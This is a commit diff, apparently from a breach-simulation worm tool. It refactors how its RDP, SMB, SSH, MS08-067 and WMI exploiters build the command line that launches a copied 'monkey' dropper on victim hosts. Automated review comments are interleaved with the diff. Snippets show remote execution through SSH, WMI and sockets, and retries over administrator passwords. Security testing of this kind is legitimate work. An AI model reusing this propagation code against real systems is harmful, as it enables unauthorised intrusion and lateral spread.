merge duplicate code

This commit is contained in:
itsikkes 2016-07-26 18:52:58 +03:00
parent 63d8c4ed12
commit 76e3350fa3
6 changed files with 30 additions and 42 deletions


@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from model.host import VictimHost
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from tools import build_monkey_commandline
__author__ = 'hoffer' __author__ = 'hoffer'
KEYS_INTERVAL = 0.1 KEYS_INTERVAL = 0.1
@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter):
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.") LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
return False return False
cmdline = " -p " + self._guid cmdline = build_monkey_commandline(host, depth-1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
if self._config.rdp_use_vbs_download: if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline} command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline}
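Review bot: The new call is spelled `depth-1` here and in the SmbExploiter and SSHExploiter hunks, but `depth - 1` in the Ms08_067_Exploiter and WmiExploiter hunks; since the commit's purpose is to unify this code, the five call sites should use one spacing, PEP 8's `build_monkey_commandline(host, depth - 1)`. The enclosing exploit method starts and ends outside the hunk.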


@ -6,6 +6,7 @@ from exploit import HostExploiter
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from network import SMBFinger
from tools import build_monkey_commandline
try: try:
from impacket import smb from impacket import smb
@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter):
else: else:
cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path} cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth-1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, )) rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))


@ -1,6 +1,7 @@
import paramiko import paramiko
import monkeyfs import monkeyfs
import logging import logging
from tools import build_monkey_commandline
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
self._guid = __import__('config').GUID
self._update_timestamp = 0 self._update_timestamp = 0
def log_transfer(self, transferred, total): def log_transfer(self, transferred, total):
@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter):
try: try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth-1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
cmdline += "&" cmdline += "&"
ssh.exec_command(cmdline) ssh.exec_command(cmdline)
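Review bot: The `self._guid` assignment is removed from SSHExploiter.__init__ in the first hunk because the GUID now comes from the helper, but the other exploiters touched by this commit (RdpExploiter, SmbExploiter, Ms08_067_Exploiter, WmiExploiter) lose their only visible use of `self._guid` without a matching removal; if their `__init__` methods also set it (not shown in this diff), those assignments are now dead and should be dropped too for consistency. SSHExploiter.__init__ continues outside that hunk, and the method containing this hunk starts and ends outside it.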


@ -396,4 +396,22 @@ def get_target_monkey(host):
host.os.get('machine','').lower() == platform.machine().lower(): host.os.get('machine','').lower() == platform.machine().lower():
monkey_path = sys.executable monkey_path = sys.executable
return monkey_path return monkey_path
def build_monkey_commandline(target_host, depth):
from config import WormConfiguration, GUID
cmdline = ""
cmdline += " -p " + GUID
if target_host.default_tunnel:
cmdline += " -t " + target_host.default_tunnel
if target_host.default_server:
cmdline += " -s " + target_host.default_server
if depth < 0:
depth = 0
cmdline += " -d %d" % depth
return cmdline
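Review bot: `WormConfiguration` is imported inside build_monkey_commandline but never referenced; only `GUID` is used, so the line should read `from config import GUID`. The helper also changes behaviour relative to the code it replaces: the old call sites appended `-d` only when `depth > 0`, while this version always appends `-d %d` and clamps negative values to 0, so a caller at depth 0 now passes `-d 0` where previously no depth flag was sent — whether that is equivalent depends on the receiving argument parser's default, which is outside this diff, and a commit titled "merge duplicate code" should not change it silently. A docstring would help readers of the new entry point, e.g. `"""Return the argument suffix for launching a child monkey on target_host: -p GUID, optional -t/-s from the host's tunnel/server, and -d depth (negative depth is clamped to 0)."""`. Since `target_host.default_tunnel` and `target_host.default_server` are concatenated unquoted into a line the callers hand to `ssh.exec_command`, `sock.send("start ...")` and `Win32_Process.Create`, a comment or check asserting they are plain host:port strings would document the assumption the helper relies on.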


@ -17,6 +17,7 @@ from . import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp from network.tools import check_port_tcp
from network import SMBFinger from network import SMBFinger
from tools import build_monkey_commandline
try: try:
from impacket import smb from impacket import smb
@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
self._config.ms08_067_remote_user_pass, self._config.ms08_067_remote_user_pass,
src_path, src_path,
self._config.dropper_target_path) self._config.dropper_target_path)
if not remote_full_path: if not remote_full_path:
# try other passwords for administrator # try other passwords for administrator
for password in self._config.psexec_passwords: for password in self._config.psexec_passwords:
@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter):
else: else:
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth - 1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
try: try:
sock.send("start %s\r\n" % (cmdline, )) sock.send("start %s\r\n" % (cmdline, ))


@ -2,6 +2,7 @@ import socket
import ntpath import ntpath
import logging import logging
import traceback import traceback
from tools import build_monkey_commandline
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from model.host import VictimHost from model.host import VictimHost
from exploit import HostExploiter from exploit import HostExploiter
@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter):
else: else:
cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path} cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
cmdline += " -p " + self._guid cmdline += build_monkey_commandline(host, depth - 1)
if host.default_tunnel:
cmdline += " -t " + host.default_tunnel
if host.default_server:
cmdline += " -s " + host.default_server
if depth > 0:
cmdline += " -d %d" % (depth - 1)
# execute the remote monkey # execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline, result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,